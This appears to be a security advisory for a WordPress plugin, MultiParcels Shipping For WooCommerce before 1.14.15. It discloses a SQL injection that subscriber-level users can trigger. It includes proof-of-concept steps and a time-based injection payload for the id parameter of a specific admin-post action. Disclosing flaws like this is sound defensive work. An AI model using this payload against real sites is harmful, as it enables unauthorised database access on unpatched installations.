MultiParcels Shipping For WooCommerce < 1.14.15 - Subscriber+ SQLi

Description The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks. Note (WPScan): The issue was fixed in 1.14.13, however a better patch was done in 1.14.15 as per our suggestion.

PoC

1. Install the WooCommerce plugin (dependency, no setup required) and the vulnerable plugin MultiParcels Shipping For WooCommerce version 1.14.12 (no setup required). 2. Login with Subscriber user, visit this URL and intercept the request: http://example.com/wp-admin/admin-post.php?action=multiparcels_delete_shipping&amp;id;=1 3. Inject payload to id parameter, for example: GET /wp-admin/admin-post.php?action=multiparcels_delete_shipping&id;=(select*from(select(sleep(10)))a) HTTP/1.1